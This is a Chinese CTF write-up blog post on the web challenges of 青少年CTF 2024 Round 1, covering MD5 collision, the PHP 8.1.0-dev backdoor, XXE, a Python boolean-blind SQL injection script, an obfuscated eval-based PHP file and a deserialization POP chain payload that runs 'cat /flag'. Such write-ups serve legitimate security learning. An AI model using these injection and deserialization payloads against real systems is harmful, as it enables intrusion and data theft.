青少年CTF2024 #Round1 wp web

最新推荐文章于 2024-10-15 13:28:02 发布
最新推荐文章于 2024-10-15 13:28:02 发布
阅读量891 收藏 11
点赞数 10
分类专栏: wp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73185293/article/details/136392230
版权

web

EasyMD5

MD5碰撞,使用工具fastcoll生成内容不同但md5值相同的两个pdf文件上传即可获得flag;

./fastcoll_v1.0.0.5.exe -p 1.pdf -o 2.pdf 3.pdf 			# -p指定任意源文件,-o指定生成两个内容不同但md5值相同的目标文件

工具下载:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

上传2.pdf和3.pdf,获取到flag;

PHP的后门

PHP 8.1.0-dev 后门命令执行漏洞,增加如下请求头rce即可获取flag;

PHP的XXE

PHP 7.0.30 + libxml 2.8.0 XML外部实体注入漏洞(xxe),参考:PHP环境 XML外部实体注入漏洞(XXE)_php7.0.30漏洞-CSDN博客

只需向dom.php发送xml即可读取flag;

Easy_SQLi

登录页面,简单测试一下,发现存在布尔盲注,且无任何过滤,直接写python脚本注入,flag在users表的password中;

import requests


url = 'http://challenge.qsnctf.com:30428/login.php'

# sql = 'select database()'
# sql = "select group_concat(table_name) from information_schema.tables where table_schema=\"qsnctf\""
# sql = "select group_concat(column_name) from information_schema.columns where table_name='users'"
sql = "select/**/group_concat(password)/**/from/**/users"   # 第二个password为flag:qsnctf{80d18e7c42514357baf1cdaf5e87fd07}
flag = ''

for i in range(1, 100): 
    left = 0
    right = 127
    mid = (left + right) // 2
    while 1:
        payload = {'psw': f"1'or ascii(substr(({sql}),{i},1))>{mid} and'1", 'uname': "admin"}
        res = requests.post(url, data=payload)
        # print(res.text)
        if 'Login successful' in res.text:  # 布尔盲注为True时的回显
            left = mid
            mid = (left + right) // 2
        else:
            right = mid
            mid = (left + right) // 2
        if mid == 1:
            break
        elif (right - left) <= 1:
            flag += chr(right)
            print(flag)
            break
    if mid == 1:
        print('已输出所有字符')
        break

雏形系统

进入容器,是个登录页面;

先目录扫描,发现www.zip,下载发现里面有如下php代码; 

<?php
    $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
        .$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
        .$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
    eval($O00O0O("JE8wTzAwMD0iS1hwSnRScmdxVU9IY0Zld3lvUFNXbkNidmtmTUlkbXh6c0VMWVpCVkdoRE51YUFUbFFqaVRhTWh5UUpVclpudHFlS0JzTndSY2ttbG9kVkFTWXBXeGpMRWJJZkNndk9GdWl6RFBHWEh3TzlCaXR6VFNtelVTZ0NzcXA5c2EzaFBxZzlzWWdQdUlzVUJURGpUbUh6VVNtZlhsZ2V4cXNmeGlnZFRTbXpVU3RqVFNtelVTbXpVU21mQlljaGppY0FVaGc1UEt0RzdtSHpVU216VVNtelVxdENIbGdQWFNtUUJiYUZ4bkJOVVNtelVTbXpVU3RmMWJwV01ic2ZwWWM1WFlnUG9sSGZWYTNRb1ozUXNpYzVrVG1QN21IelVTbXpVU216VVNtelVTbVEwaWdQeEVENXVJYXYwblhNR0RlTk5odFFOaWFBeXdrZnZxM0FNbkJOVVNtelVTbXpVU3QwVFNtelVTdDBUU216VVNnRmpiYUZ4U3RZb21IelVTbWY3bUh6VVNtelVTbXpVcXRDSGxnUFhTbVF4SWFVN21IelVTbXpVU216VXF0Q0hsZ1BYU21RdkkyWjdtSHpVU216VVNtelVxdENIbGdQWFNtUU1sa1FQbGtRTWwyNDdtSHpVU216VVNtelVxdENIbGdQWFNnSTFscEYwaWM5dVNlOVZJZ0N4WXRoMWIzR05UYWpUU216VVNtelVTbXpVU216VUljRk5sc3pIUmdkVUN0aDVTdEZQcXBQdmxnUDZJUmZGSVJMSG5CTlVTbXpVU216VVNtelVTbXpkWWd2TXFzMCtpYzV4cWdDWFltVU1uQk5VU216VVNtelVTdDBUU216VVNtelVTbWZwWWM1WFlnUG9sSGZNbGtGQkljRjBUbVA3bUh6VVNtelVTbXpVU216VVNnUHBUbVEwaWdQeEVENXhJYVU5d1JZSGwzZGtoSGJkWWd2TXFzMCtiY1lQd0Qwa0ljUGtpdFFQSWM0a1RHTlVTbXpVU216VVNtelVTbWY3bUh6VVNtelVTbXpVU216VVNtelVTbWZQYjJ2b1NtUTBpZ1B4RUQ1TWxrUVBsa1FNbDI0N21IelVTbXpVU216VVNtelVTdDBUU216VVNtelVTbXpVU216VUljRk5sc3pIOGgrSXZETDQ1bFRmOGgrU2pIUzdtSHpVU216VVNtelVWR05VU216VVZHTlRTbXpVU2dGamJhRnhTTFFQbGM4VFNtelVTdGpUU216VVNtelVTbWZCWWNoamljQVVoZ0w3bUh6VVNtelVTbXpVcTNRdllnUFhTZ0kxbHBGMGljOXVTZTlWYjJlamxlRjBiYVFNYnNVZGJjRjBpYzl1RW16ZElnOE1tSHpVU216VVNtelVLQk5VU216VVNtelVTbXpVU21ma2xnOUhiY0JVaGdTN21IelVTbXpVU216VVNtelVTbVFIVG1RZGwxakJhUmQ3bUh6VVNtelVTbXpVVkdOVVNtelVWR05UU216VVNtUUhTTzBVaGU5R0QxRlpjc1lCYmFGeFkyOXNJbVlZbkJOVVNtelVoZ0xVd1J6ZGExZndaMVFsaDNDeElhaHViYzFQaDEwN21IelVTbWZ6WWM1eElhaE1iY1dNS3BaTmhnTE1uQk5VU216VWljYlVUbWVNcTNGUFltVWRiSGRNU3RqVFNtelVTbXpVU21mUGIydm9TbVM5d0QwOXdEMDl3RDA5d0QwOXdEMDl3RDFHRGVOVVJjNUJZYUdVY2M5MXFIZm5iYzFQU0QwOXdEMDl3RDA5d0QwOXdEMDl3RDA5d1JTN21IelVTbWY5bUh6VVNtZk1JSFVkYkQwOWgyZWRsY1B1aHNicGhnUzl3UlNraXhlcFljdjFoM0FVWWdDeFltZmRJYzFvU0hkVFNtelVTdGpUU216VVNtelVTbWZQYjJ2b1RtRWtwbG9Qb0lhcEhoT1BITThIVERqVFNtelVTdDBUbUh6VVNtei93VT09IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
    ?>

将混淆后的代码整理,如下,发现存在php反序列化漏洞;

<?php
    error_reporting(0);

    class shi
    {
        public $next;
        public $pass;
        public function __toString(){
            $this->next::PLZ($this->pass);
        }
    }
    class wo
    {
        public $sex;
        public $age;
        public $intention;
        public function __destruct(){
            echo "Hi Try serialize Me!";
            $this->inspect();
        }
        function inspect(){
            if($this->sex=='boy'&&$this->age=='eighteen')
            {
                echo $this->intention;
            }
            echo "🙅18岁🈲";
        }
    }

    class Demo
    {
        public $a;
        static function __callStatic($action, $do)
        {
            global $b;
            $b($do[0]);
        }
    }

    $b = $_POST['password'];
    $a = $_POST['username'];
    @unserialize($a);
    if (!isset($b)) {
        echo "==================PLZ Input Your Name!==================";
    }
    if($a=='admin'&&$b=="'k1fuhu's test demo")
    {
        echo("登录成功");
    }

    ?>

构造pop链:wo:__destruct() => shi:__toString() => Demo:__callStatic() ,payload如下;

<?php

class shi
{
    public $next;
    public $pass = 'cat /flag';
}
class wo
{
    public $sex = 'boy';
    public $age = 'eighteen';
    public $intention;
}
class Demo
{
    public $a;
}

$a = new wo();
$b = new shi();
$c = new Demo();
$a->intention = $b;
$b->next = $c;

echo serialize($a);

//O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":1:{s:1:"a";N;}s:4:"pass";s:9:"cat /flag";}}

传参执行system("cat /flag")命令,反序列化payload为用户名username,system为密码password;

# post传参
username=O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":1:{s:1:"a";N;}s:4:"pass";s:9:"cat /flag";}}
password=system

陇原战役 Crypto题目WriteUP WP CTF竞赛
zxsctf的博客
03-27 499
陇原战役 Crypto题目WriteUP WP CTF竞赛
快速MD5强碰撞生成器:fastcoll
m0_68483928的博客
08-16 2985
fastcoll是一款专用工具,旨在快速找到两个具有相同MD5哈希值的不同文件。它利用MD5算法的特定弱点,通过数学运算找到不同输入,使它们共享相同的哈希前缀,从而实现强碰撞。 它使用了一种优化算法,能够在短时间内生成两个不同的消息,确保它们的MD5哈希相同。这是通过深入分析MD5的结构和特性,找出可以操控的部分来实现的。
青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP
Jay17的博客
03-02 1940
青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP
CTFshow的Web题目wp(持续更新)
苦行僧的妖孽日常
08-15 1244
CTFshow的Web题目wp(持续更新)
青少年CTF擂台挑战赛 2024 #Round 1
NYG694的博客
03-02 2404
文件打开是一个print数组v4的地址和read函数,并且nx好像可写,输入长度可以利用,进行一个栈上写好自己的shell,然后在构造一个回到v4的地址,这样子就可以重新读取到写buf段上的shell,这里要注意shell的隔断用/00截断然后构造好栈上数据。一个sql注入题目,尝试使用二分查找,但只能爆出表名和列名,值一直出不来,后来采用布尔盲注,fuzz测试后发现没有加任何过滤,直接写脚本。第二题:为了求解方程 (5 + sqrt{x} = 8),我们可以分离平方根项,然后求解 (x)。
利用fastcoll实现MD5碰撞
LYJ20010728的博客
03-07 2903
源码: <?php show_source(__FILE__); class CDUTSEC { public $var1; public $var2; function __construct($var1, $var2) { $var1 = $var1; $var2 = $var2; } function __destruct() { echo md5($this->var1);
使用fastcoll生成字符串MD5碰撞
克格莫(有需要的私信)
06-24 9511
CTF的时候会遇到诸如$a!=$b&&md5($a)===md5($b)的题。 这就要求我们找到这样的两个字符串a和b,内容不同,但md5值相同。这就涉及到md5的碰撞。 我们使用fastcoll来快速生成这种碰撞。 1.建立一个a.txt,内容如下: 2.将这个文件拖到fastcoll_v1.0.0.5.exe上,等于使用fastcoll打开它。 3.fastcoll会自动生成两个文件: 这两个文件内容不同,但是md5值是相同的。 然后我们写一个php脚本根据生成的文件生成碰撞的字符
【小工具发现系列-2】fastcoll_v1.0.0.5.exe md5碰撞
m0_73683234的博客
04-01 2343
不管是做ctf题目或者是现实环境中,往往会有md5散列的情况,而ctf中更是有很多题目都会有什么比较字符串不同而md5值相同什么的,这里就可以利用一款小工具,fastcoll_v1.0.0.5.exe。我们一般会用到的就是-p和 -o,-p参数是干什么的呢,其实就是初始输入,我们用-o参数得到的新文件的值都是根据初始的-p输入的文件得到的。由于生成的文件是十六进制编码后的结果,这里用hxd打开,可以看到生成的1.txt和2.txt都有初始的aleicnb。可以看到有两个txt文件生成了,打开看一下。
qsnctf
2301_79678604的博客
12-12 472
下载完安装包后,用kali虚拟机打开,解压之后直接利用strings口令。得到一串 ,之后通过查找flag得到flag。
fastcoll_v1.0.0.5.exe
02-26
fastcoll_v1.0.0.5.exe MD5伪造工具 每一个文件都有自己的文件指纹(MD5值等等相当shenfen证),很多平台会检测文件是否重复(如:1688的详情页图片是否原创检测、百度图片原创筛选、各大视频平台去重等等,他们机器检测MD5发现有与数据库中重复的轻则账号降权,重则被对应平台直接删除)。工具修改后相当文件拥有了新的指纹,可有效规避些类问题,提高工作效率。
fastcoll伪造MD5值
10-31
MD5是目前最热门的加密算法,我们通常用MD5值来验证文件的完整性。例如在一些比较正规的下载网站,通常会提供软件的MD5值,这样我们就可以对下载回来的文件用MD5校检软件(如HashX等)做一次MD5校验,以确保我们获得的文件与该站点提供的文件为同一文件。但当两个不同文件的MD5值完全一样时,你还会信任MD5吗? 找出破解MD5加密方法的专家是我国山东大学的王小云教授,这则新闻在以前的软件版块曾详细报道过。但之后MD5的破解一直没有进展,直到最近,国外的科学家研究出了新的MD5碰撞破解方法,可以让两个不同文件的MD5值完全一样,而之前我们一直认为一个文件的MD5值在世界上是独一无二的,这就像一个人克隆了你的指纹然后冒充你一样恐怖! 为了验证MD5值的独一无二性,我们来做一个简单的试验: 在桌面上新建一个文本文档,文件名为“test.txt”,内容为“OfficeBa”。然后将这个文本文档拖动到校验工具HashX中,点击左上角的“Hash File”按钮,得到其MD5值为051cb2917a5b70505e1687dee449c765,然后为文档中的“OfficeBa”加上双引号,保存后再通过HashX进行校检,发现MD5值变成了9ab117400993b70bc9945a9b15749d5d了。可见,一个极细微的变动都会导致文件的MD5值不同! 那么我们能让两个程序文件的MD5一致,却又都能正常运行,并且可以做完全不同的事情么?答案是:“可以!”。要让两个不同文件的MD5值相同,可以通过一款名为fastcoll的小工具来完成我们同样以刚才的test.txt来做试验: -h [--help] 显示选项 -q [--quiet] 简化 -i [-ihv] arg 使用指定的初始值,默认是md5初始值 -p [-prefixfile] arg 使用给定的前缀计算初始值,仍然把数据复制到输出文件中(必须是个文件名) -o [--out] arg 指定输出文件名,此选项必须是最后一个参数,而且两个文件名必须同时指定 默认的是 -o msg1.bin msg2.bin 把解压出来的fastcoll_v1.0.0.5.exe与test.txt放在同一目录,然后在“命令提示符”中输入:“fastcoll_v1.0.0.5.exe -i test.txt -p test.txt -o cbi.exe cbi2.exe”并回车,在同目录中会生成名为cbi.exe和cbi2.exe文件,我们用HashX校验他们的MD5值,可以发现是完全一样的,但是在HashX中用“SHA-1”加密算法进行校验的时候,结果竟然是不同的(SHA-1加密算法生成的结果也是独一无二的)!可见这已经是完全不同的两个文件,但是他们的MD5值竟然完全相同。 如果黑客从网上下载一个工具,给其捆绑上木马,然后通过工具让其MD5值和原文件一样。那么当用户下载了文件后用MD5校验工具进行校验时就会发现带毒文件和原文件MD5值完全一样,就会放心地去运行,结果可想而知。所以,MD5加密已经不再可信!
探索MD5碰撞的奥秘:fastcoll工具与源码深度解析
最新发布
gitblog_09770的博客
10-15 907
探索MD5碰撞的奥秘:fastcoll工具与源码深度解析 【下载地址】MD5碰撞工具fastcoll及其源码与相关论文 MD5碰撞工具fastcoll及其源码与相关论文 项目地址: https://gitcode.com/open...
pop学习之入门题一:
m0_74057302的博客
03-12 363
每个人最开始都是无名之辈,无人问津,无比渺小。可是我们仍能靠努力成为自己的英雄。
MD5碰撞工具fastcoll及其源码与相关论文
gitblog_09763的博客
10-12 1115
MD5碰撞工具fastcoll及其源码与相关论文 MD5碰撞工具fastcoll及其源码与相关论文 MD5碰撞工具fastcoll及其源码与相关论文 项目地址: https://gitcode.com/open-source-to...
青少年CTF-邹型系统
CTF
03-10 471
扫描出www.zip文件,具体详细步骤看我的网站wp(
fastcoll工具试用记
weixin_33701617的博客
03-05 1572
2019独角兽企业重金招聘Python工程师标准>>> ...
XYCTF 2024 部分web wp
焦虑的焦虑
04-26 2637
XYCTF 2024 部分web wp
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值